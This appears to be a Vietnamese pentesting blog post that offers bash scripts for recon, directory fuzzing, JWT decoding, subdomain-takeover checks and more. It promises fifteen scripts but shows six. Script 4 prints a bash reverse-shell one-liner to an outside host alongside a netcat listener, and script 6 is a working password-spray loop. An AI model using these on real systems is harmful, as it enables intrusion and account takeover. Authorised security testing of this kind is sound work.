Bash Scripting cho Hacker: 15 Script thực tế cho Recon và Automation

~2 min readby

Bash không phải là ngôn ngữ đẹp nhất, nhưng khi bạn cần automation nhanh trong pentest, không có gì hiệu quả hơn. Đây là 15 script thực tế mà tôi dùng thường xuyên.

1. Quick Recon Script

#!/bin/bash
TARGET=$1
OUTPUT="recon_${TARGET}_$(date +%Y%m%d)"
mkdir -p $OUTPUT

echo "[*] Running recon on $TARGET"

# Subdomain enumeration
echo "[+] Subdomains..."
subfinder -d $TARGET -silent > $OUTPUT/subdomains.txt
amass enum -passive -d $TARGET -o $OUTPUT/amass.txt 2>/dev/null
cat $OUTPUT/subdomains.txt $OUTPUT/amass.txt | sort -u > $OUTPUT/all_subs.txt
echo "    Found: $(wc -l < $OUTPUT/all_subs.txt) subdomains"

# Check live hosts
echo "[+] Live hosts..."
cat $OUTPUT/all_subs.txt | httpx -silent -status-code > $OUTPUT/live.txt
echo "    Live: $(wc -l < $OUTPUT/live.txt) hosts"

# Port scan on live hosts
echo "[+] Port scanning..."
cat $OUTPUT/live.txt | awk '{print $1}' | \
  sed 's|https\?://||' | \
  nmap -iL - -T4 --top-ports 1000 -oN $OUTPUT/ports.txt 2>/dev/null

echo "[*] Done! Results in ./$OUTPUT/"

2. Directory Brute Force Wrapper

#!/bin/bash
URL=$1
WORDLIST="${2:-/usr/share/wordlists/dirb/common.txt}"

echo "[*] Fuzzing: $URL"
ffuf -u "$URL/FUZZ" \
     -w $WORDLIST \
     -mc 200,301,302,403 \
     -ac \
     -t 50 \
     -o "ffuf_$(date +%s).json" \
     -of json

3. JWT Decoder One-liner

#!/bin/bash
# Decode JWT token (header + payload, không verify signature)
JWT=$1
decode_part() {
    echo "$1" | tr '_-' '/+' | \
    awk '{l=length($0)%4; if(l>0) $0=$0 substr("====",1,4-l); print}' | \
    base64 -d 2>/dev/null | python3 -m json.tool
}

IFS='.' read -r header payload signature <<< "$JWT"
echo "=== HEADER ==="
decode_part "$header"
echo "=== PAYLOAD ==="
decode_part "$payload"

4. Simple Reverse Shell Catcher

#!/bin/bash
PORT=${1:-4444}
echo "[*] Listening on port $PORT..."
echo "[*] Setup reverse shell:"
echo "    bash -i >& /dev/tcp/$(curl -s ifconfig.me)/$PORT 0>&1"
echo ""
nc -lvnp $PORT

5. Mass Subdomain Takeover Check

#!/bin/bash
# Check if CNAME points to unclaimed service
while read -r subdomain; do
    cname=$(dig +short CNAME "$subdomain" 2>/dev/null)
    if [ -n "$cname" ]; then
        # Check if resolves to anything
        ip=$(dig +short "$cname" 2>/dev/null)
        if [ -z "$ip" ]; then
            echo "[!] POTENTIAL TAKEOVER: $subdomain → $cname (no IP)"
        fi
    fi
done < "$1"

6. Password Spray Script

#!/bin/bash
# CHỈ dùng trên hệ thống bạn được phép test
TARGET_URL=$1
USERLIST=$2
PASSWORD=$3

while read -r user; do
    response=$(curl -s -o /dev/null -w "%{http_code}" \
        -X POST "$TARGET_URL" \
        -d "username=$user&password=$PASSWORD" \
        -L)
    if [ "$response" != "200" ] && [ "$response" != "401" ]; then
        echo "[+] HIT: $user:$PASSWORD (HTTP $response)"
    fi
    sleep 1  # Rate limiting
done < "$USERLIST"

Leave a Comment